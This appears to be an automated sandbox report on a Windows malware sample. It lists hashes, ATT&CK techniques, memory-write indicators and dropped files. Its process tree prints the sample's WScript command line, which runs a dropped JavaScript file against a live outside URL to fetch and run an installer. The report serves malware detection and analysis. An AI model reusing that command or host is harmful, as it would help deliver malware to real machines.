878b58285da52aac6d5e9364771034997f85d71ee2840e36805bfdfb1fa6d3fe

Analysis

max time kernel
121s
max time network
121s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
01/10/2024, 21:51

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

078f742c471a846a2f44df04fcd9401f_JaffaCakes118.exe
Size

184KB
MD5

078f742c471a846a2f44df04fcd9401f
SHA1

fef13b9762aa17503c14ab68170c9a1be45ea0f5
SHA256

878b58285da52aac6d5e9364771034997f85d71ee2840e36805bfdfb1fa6d3fe
SHA512

37073cff5084751a05642a928a286216d174d187587f3edfd3941a910dfe0326180f0bcd7f4ac88e15bcec28b4887f8d2f2922c3f294123f0802f682589e95a0
SSDEEP

3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3N:/7BSH8zUB+nGESaaRvoB7FJNndnU

Score

8^/10

discovery execution

Malware Config

Signatures

Blocklisted process makes network request 12 IoCs

flow	pid	Process
6	804	WScript.exe
8	804	WScript.exe
10	804	WScript.exe
12	988	WScript.exe
13	988	WScript.exe
16	2744	WScript.exe
17	2744	WScript.exe
19	3020	WScript.exe
20	3020	WScript.exe
28	2356	WScript.exe
29	2356	WScript.exe
31	2356	WScript.exe

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	078f742c471a846a2f44df04fcd9401f_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 2432 wrote to memory of 804	2432	078f742c471a846a2f44df04fcd9401f_JaffaCakes118.exe	31
PID 2432 wrote to memory of 804	2432	078f742c471a846a2f44df04fcd9401f_JaffaCakes118.exe	31
PID 2432 wrote to memory of 804	2432	078f742c471a846a2f44df04fcd9401f_JaffaCakes118.exe	31
PID 2432 wrote to memory of 804	2432	078f742c471a846a2f44df04fcd9401f_JaffaCakes118.exe	31
PID 2432 wrote to memory of 988	2432	078f742c471a846a2f44df04fcd9401f_JaffaCakes118.exe	33
PID 2432 wrote to memory of 988	2432	078f742c471a846a2f44df04fcd9401f_JaffaCakes118.exe	33
PID 2432 wrote to memory of 988	2432	078f742c471a846a2f44df04fcd9401f_JaffaCakes118.exe	33
PID 2432 wrote to memory of 988	2432	078f742c471a846a2f44df04fcd9401f_JaffaCakes118.exe	33
PID 2432 wrote to memory of 2744	2432	078f742c471a846a2f44df04fcd9401f_JaffaCakes118.exe	35
PID 2432 wrote to memory of 2744	2432	078f742c471a846a2f44df04fcd9401f_JaffaCakes118.exe	35
PID 2432 wrote to memory of 2744	2432	078f742c471a846a2f44df04fcd9401f_JaffaCakes118.exe	35
PID 2432 wrote to memory of 2744	2432	078f742c471a846a2f44df04fcd9401f_JaffaCakes118.exe	35
PID 2432 wrote to memory of 3020	2432	078f742c471a846a2f44df04fcd9401f_JaffaCakes118.exe	37
PID 2432 wrote to memory of 3020	2432	078f742c471a846a2f44df04fcd9401f_JaffaCakes118.exe	37
PID 2432 wrote to memory of 3020	2432	078f742c471a846a2f44df04fcd9401f_JaffaCakes118.exe	37
PID 2432 wrote to memory of 3020	2432	078f742c471a846a2f44df04fcd9401f_JaffaCakes118.exe	37
PID 2432 wrote to memory of 2356	2432	078f742c471a846a2f44df04fcd9401f_JaffaCakes118.exe	39
PID 2432 wrote to memory of 2356	2432	078f742c471a846a2f44df04fcd9401f_JaffaCakes118.exe	39
PID 2432 wrote to memory of 2356	2432	078f742c471a846a2f44df04fcd9401f_JaffaCakes118.exe	39
PID 2432 wrote to memory of 2356	2432	078f742c471a846a2f44df04fcd9401f_JaffaCakes118.exe	39

C:\Users\Admin\AppData\Local\Temp\078f742c471a846a2f44df04fcd9401f_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\078f742c471a846a2f44df04fcd9401f_JaffaCakes118.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2432
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufE5DC.js" http://www.djapp.info/?domain=bSZmhswluu.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fufE5DC.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:804
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufE5DC.js" http://www.djapp.info/?domain=bSZmhswluu.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fufE5DC.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:988
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufE5DC.js" http://www.djapp.info/?domain=bSZmhswluu.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fufE5DC.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:2744
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufE5DC.js" http://www.djapp.info/?domain=bSZmhswluu.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fufE5DC.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:3020
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufE5DC.js" http://www.djapp.info/?domain=bSZmhswluu.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fufE5DC.exe
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  PID:2356

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12

Filesize
1KB

MD5
7fb5fa1534dcf77f2125b2403b30a0ee

SHA1
365d96812a69ac0a4611ea4b70a3f306576cc3ea

SHA256
33a39e9ec2133230533a686ec43760026e014a3828c703707acbc150fe40fd6f

SHA512
a9279fd60505a1bfeef6fb07834cad0fd5be02fd405573fc1a5f59b991e9f88f5e81c32fe910f69bdc6585e71f02559895149eaf49c25b8ff955459fd60c0d2e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8

Filesize
436B

MD5
971c514f84bba0785f80aa1c23edfd79

SHA1
732acea710a87530c6b08ecdf32a110d254a54c8

SHA256
f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895

SHA512
43dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12

Filesize
174B

MD5
9b5b5ba22cf5741b70971a895f674329

SHA1
25e5ecd3be162fc1a87b0b1943a865af2cd048af

SHA256
e47265204a041d2793390a3db386032f188bff1f17288975e34cf908a721ab77

SHA512
9f844a1f8b27ff85245812fe0bd6b04b00543afa5a9fdea937a38d65b9e0550e04b47ef845b3aebf11204f52914af00c9f6f13d086691d2fd3e8cef0a76a760d

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8

Filesize
170B

MD5
d5d548cf8c2de0168b26d759dadd8893

SHA1
9d34ae6642cce4941e9e02bc370ebd0e749b886d

SHA256
1bdd915e99477dee3579641cf7e7564184e4c94a6d0f947ad04312ad478e8340

SHA512
ccaa929bc52c1c8d2e37776abf62839006d311e7cf7cf7da924d4cf9e3fc8238207fc4ce6832a7c69bfb5fb89f2c753b1b68c31b583f4a1ca521d4252e263ce1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\633SXO0D\domain_profile[1].htm

Filesize
40KB

MD5
d022511805f6285ddd1857afe83f246c

SHA1
309dd64394ca4e7c957db84552e8d6f302c6d547

SHA256
ba2be20cb289446eea36f3bf575adbbf21201be983f8748a4e2c152667cd8eb5

SHA512
d9395792e95ae3f02476b65e388ba21e41b40424b63fe79ae6a1f844db1560340c932a1ee7fb90e42099fea13a8d3848dc119c2d37fa2191e3bc4807ad85fa64

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\633SXO0D\domain_profile[1].htm

Filesize
40KB

MD5
9afec667561c290f9312e3cf1ce2ef73

SHA1
680fee943d2476f752491ea934fd6c70686144fe

SHA256
f25060e3bb8e54abd16cfe3473144776cbf9d40fd325924d82eb01a9ede17c7a

SHA512
bc827d8fb6bc94e1b1826513b1edbd4aeca57d217248d4466812286ba41ff1a889a92d54e5bac367a4a1d3038e38842f62f930d8b37270e83e89e6aeb3ab8487

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\633SXO0D\domain_profile[1].htm

Filesize
40KB

MD5
5bc1a8c596d5e422e1c81af8e34d9941

SHA1
edf3a0f2e4ad111b8369dd64d38f535d49b69105

SHA256
25e841a4266634f1c893820ed9d8c4dda4d3eac0e8f931455a97de7b1d4ff89f

SHA512
3c437aeefbd172e3447f5d82c2ccedd0da38a467e1a008af59cfc84865f686240f146201786f11937e5593a29493548e7863f2da6e61165bf4c7de619d476470

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PLSLTMYI\domain_profile[1].htm

Filesize
40KB

MD5
8229416f7c7c7ecc99cd8e1b784f37af

SHA1
b0898aec1a86a62b06342b7dff8937572801144b

SHA256
847a04ec120b26439f31aff9d2a568725a9ae6917c4d2ac0af755f710690df74

SHA512
1ed8ab6e4aa914d8364a95cbb21e038431d83fffac3eedf36c342457ba4437bf3bac9b4465cdd303dbfc6946f4573be994896878425f9a8eda1a35cbf1058168

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PLSLTMYI\domain_profile[1].htm

Filesize
40KB

MD5
1be7b0849139797c20b796c84e20fcec

SHA1
b00886e9b4743cf3178ed4a324692d4da7761eee

SHA256
df7bd19bebc550b25c98d3e4cb836fbe556e7127fc935ffddfbcd88b929edf73

SHA512
66ea1f0fedca7e6c942a231bd987c94acc7817bae55503a4ff52c7e28462b9dcdc4636ee7494201b4ef035017a2da7ecfa54cb457da5fc7c4a88ae91cee381e6

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab471E.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar5E38.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Users\Admin\AppData\Local\Temp\fufE5DC.js

Filesize
3KB

MD5
3813cab188d1de6f92f8b82c2059991b

SHA1
4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

SHA256
a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

SHA512
83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\MFP9OQXU.txt

Filesize
175B

MD5
568562fdafc2d0b3da1214b02e607dbe

SHA1
0298e5a425b020ebad0ffccd382bf20862981d42

SHA256
e762525d5550ba0d30b6da695e5bf8643960b0746a3f5187c8ee26ac7d2a88fe

SHA512
e3d1aa4e89e0095fbd099bb99a642b417d32bad5dc810196c10f7f488abf17f7c242384a7ade5c816664ee627f7287aeaf00d433b262cbc9f8ba41c1a5c9f481

Download Submit